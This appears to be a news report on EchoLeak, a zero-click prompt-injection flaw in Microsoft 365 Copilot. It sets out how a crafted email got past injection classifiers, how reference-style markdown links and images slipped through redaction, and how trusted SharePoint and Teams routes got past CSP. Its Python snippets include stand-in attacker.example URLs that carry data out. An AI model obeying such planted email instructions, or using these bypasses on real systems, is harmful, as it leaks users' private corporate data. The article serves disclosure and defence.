Security researchers at Aim Security discovered “EchoLeak”, the first known zero-click artificial intelligence (AI) vulnerability in Microsoft 365 Copilot that allowed attackers to silently siphon off sensitive corporate data by simply sending a maliciously crafted email that required no interaction from the user, no link-clicking, and no downloads.

“This vulnerability represents a significant breakthrough in AI security research because it demonstrates how attackers can automatically exfiltrate the most sensitive information from Microsoft 365 Copilot’s context without requiring any user interaction whatsoever,” Adir Gruss, Aim Security’s co-founder and CTO, said while describing the zero-click attack.

What Is EchoLeak?



Discovered in January 2025 and disclosed after Microsoft’s MSRC team fixed it in May, EchoLeak could have enabled attackers to exfiltrate sensitive information from a user’s connected Microsoft 365 environment, including Outlook emails, OneDrive files, Office documents, SharePoint content, and Teams chat history, simply by sending a maliciously crafted email. This email would bypass multiple security safeguards and trigger Copilot to leak internal data it would otherwise keep private.

What’s even more alarming is that the attacker doesn’t need to be an employee of the organization. Any external sender could initiate the attack.

In a blog post on Wednesday, the Aim Labs Team wrote that EchoLeak exploited a concept that they described as a “Large Language Model (LLM) Scope Violation.” In this case, a malicious actor sends an innocent-looking email laced with a hidden prompt disguised using markdown formatting.

When a user later asks Copilot a related question, the AI retrieves the email from its context and unknowingly executes the embedded instructions, extracting sensitive data from internal sources like documents, emails, or chats.

Then, the attacker’s prompt instructs Copilot to embed the extracted data within an image or link. This causes the browser to automatically fetch the resource, often through trusted Microsoft domains like SharePoint or Teams, instantly sending the sensitive information to an attacker-controlled server, all while remaining invisible to the user.

How The EchoLeak Attack Chain Works

The attack chain works in four stages:

1. XPIA Bypass

Microsoft uses XPIA (cross-prompt injection attack) classifiers to detect and block suspicious prompts before they reach M365 Copilot’s underlying LLM. However, Aim Security found that a prompt injection could easily bypass these classifiers if the email was phrased as casual guidance for its recipient and avoided any mention of AI, assistants, or Copilot.

2. Link Redaction Bypass

Normally, Copilot redacts external markdown links from the chat history before the user has any chance of clicking those links.

But with tricks such as reference-style markdown links, attackers evade Copilot’s redaction filters, so the links are not removed from the chat by M365 Copilot. The links then appear in the LLM output, carrying the extracted data with them.

3. Image Redaction Bypass

To eliminate the need for the user to click anything at all, attackers use reference-style image markdown. The browser tries to “load” the image from an attacker-controlled server, which then automatically triggers data exfiltration without user interaction.
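The two redaction bypasses can be illustrated with a minimal Python sketch. The pattern below is a hypothetical stand-in for a filter that recognizes only inline markdown links and images; it is not Copilot’s actual redaction logic, and `attacker.example` is a placeholder domain.

```python
import re

# Hypothetical redaction pattern (an assumption for illustration):
# matches inline links and images such as [text](https://...) or ![alt](https://...)
INLINE_LINK_OR_IMAGE = re.compile(r"!?\[([^\]]*)\]\((https?://[^)\s]+)\)")


def redact_inline(markdown: str) -> str:
    """Replace inline external links and images with their visible text only."""
    return INLINE_LINK_OR_IMAGE.sub(r"\1", markdown)


# Inline forms: the URL sits right next to the link text, so the pattern finds it.
inline_link = "See [the report](https://attacker.example/?d=secret)."
inline_image = "![chart](https://attacker.example/c.png?d=secret)"

# Reference-style forms: the URL lives in a separate definition line.
reference_link = "See [the report][ref].\n\n[ref]: https://attacker.example/?d=secret"
reference_image = "![chart][ref]\n\n[ref]: https://attacker.example/c.png?d=secret"

for sample in (inline_link, inline_image, reference_link, reference_image):
    redacted = redact_inline(sample)
    status = "redacted" if redacted != sample else "passed through unchanged"
    print(f"{status}: {sample!r}")
```

In this sketch the inline forms are stripped while the reference-style forms pass through untouched, because the URL is no longer adjacent to the bracketed text that the pattern looks for.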

4. CSP Bypass Using SharePoint

Since most external domains are blocked by Microsoft’s Content Security Policy (CSP), the researchers routed their exploit through sanctioned Microsoft services like SharePoint and Microsoft Teams. This enabled the attacker to silently exfiltrate sensitive Copilot context data without any user interaction, detection, or additional access permissions.
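A rough Python sketch shows why a host-based allowlist alone does not stop this kind of routing. The allowlist entries, the `contoso` tenant name, and the `/hypothetical/fetch` path are all assumptions made for illustration; they are not Microsoft’s actual CSP or real service endpoints. The sketch also assumes that the trusted service forwards or fetches the nested URL on the attacker’s behalf.

```python
from urllib.parse import urlparse

# Hypothetical allowlist of host suffixes (not Microsoft's real policy).
ALLOWED_HOST_SUFFIXES = (".sharepoint.com", ".teams.microsoft.com")


def host_allowed(url: str) -> bool:
    """Return True when the URL's host is on the allowlist, as a host-only check would."""
    host = (urlparse(url).hostname or "").lower()
    return any(
        host == suffix.lstrip(".") or host.endswith(suffix)
        for suffix in ALLOWED_HOST_SUFFIXES
    )


# A direct request to the attacker's server is rejected.
direct = "https://attacker.example/img.png?d=secret"

# The same destination nested inside a request to an allowed host is accepted,
# because the check never looks past the outer hostname.
routed = (
    "https://contoso.sharepoint.com/hypothetical/fetch"
    "?url=https%3A%2F%2Fattacker.example%2Fimg.png%3Fd%3Dsecret"
)

print(host_allowed(direct))
print(host_allowed(routed))
```

The check only inspects where the browser sends its request, not where the trusted service sends the data next.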

Beyond the technical mechanics, the exploit hinges on a tactic Aim Labs calls “RAG Spraying,” where attackers boost their success rate by flooding the system with a long email broken into chunks or multiple emails crafted to match likely user queries.
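The idea behind RAG spraying can be sketched with a toy retriever. The word-overlap score below is a deliberately simple stand-in for whatever retrieval Copilot actually uses, and the documents and queries are invented for illustration.

```python
def tokens(text: str) -> set[str]:
    """Lowercase, whitespace-split bag of words."""
    return set(text.lower().split())


def score(query: str, chunk: str) -> float:
    """Jaccard word overlap between a query and a chunk (toy relevance score)."""
    q, c = tokens(query), tokens(chunk)
    union = q | c
    return len(q & c) / len(union) if union else 0.0


def retrieve(query: str, chunks: list[str], k: int = 1) -> list[str]:
    """Return the k chunks with the highest overlap score."""
    return sorted(chunks, key=lambda ch: score(query, ch), reverse=True)[:k]


# Invented mailbox contents.
legit = [
    "quarterly sales figures for the emea region",
    "office lunch menu for friday",
]
# Attacker chunks, each worded to match a different likely question.
sprayed = [
    "how to request vacation days guide",
    "how to reset your password guide",
    "how to file an expense report guide",
]
corpus = legit + sprayed

queries = [
    "how to request vacation days",
    "how to reset your password",
    "how to file an expense report",
]
for q in queries:
    top = retrieve(q, corpus)[0]
    print(f"{q!r} -> {top!r} (attacker chunk: {top in sprayed})")
```

Each additional chunk covers another plausible question, which is how spraying raises the odds that some attacker-written text lands in the model’s context.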

Once Copilot retrieves the malicious content, it unknowingly follows the attacker’s instructions to extract the most sensitive data from its internal context and send it to the attacker’s domain, all without any user awareness.

This exploit chain highlights critical design flaws in how AI assistants interact with internal data and interpret user inputs.

Microsoft’s Response

Microsoft assigned CVE-2025-32711 to the critical zero-click flaw with a CVSS score of 9.3, and applied a server-side fix in May 2025 that required no action from customers. The Redmond giant also noted that there is no evidence of any real-world exploitation, and no customers are known to be affected.

In light of the EchoLeak vulnerability, users and organizations are advised to take several proactive steps to mitigate potential risks. These include disabling external email context in Copilot to limit untrusted data sources, scanning incoming emails for embedded prompts, implementing AI-specific runtime guardrails at the firewall level to monitor and block unusual behavior, and restricting markdown rendering in AI outputs to prevent data exfiltration through links and images.
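As one possible shape for the last of these steps, the Python sketch below strips links and images from AI output unless they point to an allowlisted host, covering both inline and reference-style markdown. It is a minimal illustration under stated assumptions, not a complete markdown parser or a vendor-recommended control; `intranet.example` and `attacker.example` are placeholder hosts.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; relative URLs have no host and are treated as untrusted.
TRUSTED_HOSTS = {"intranet.example"}

# Inline form: [text](url) or ![alt](url), optionally with a title after the URL.
INLINE = re.compile(r"!?\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
# Reference definition: "[label]: url" on its own line.
REF_DEF = re.compile(r"^ {0,3}\[[^\]]+\]:[ \t]*<?([^\s>]+)>?.*$", re.MULTILINE)


def is_trusted(url: str) -> bool:
    """True when the URL's host is on the allowlist."""
    return (urlparse(url).hostname or "").lower() in TRUSTED_HOSTS


def sanitize(markdown: str) -> str:
    """Neutralize links and images that point to untrusted hosts."""
    # Inline links/images: keep only the visible text when the host is untrusted.
    out = INLINE.sub(
        lambda m: m.group(0) if is_trusted(m.group(2)) else m.group(1), markdown
    )
    # Reference definitions: drop the line when the host is untrusted, which
    # leaves any [text][label] usage as plain text with nothing to resolve to.
    return REF_DEF.sub(lambda m: m.group(0) if is_trusted(m.group(1)) else "", out)


llm_output = (
    "Summary: [details](https://attacker.example/?d=secret)\n"
    "![logo][r]\n\n"
    "[r]: https://attacker.example/p.png?d=secret\n"
)
print(sanitize(llm_output))
```

Dropping the definition rather than the usage keeps the visible text intact while leaving the renderer with no URL to fetch.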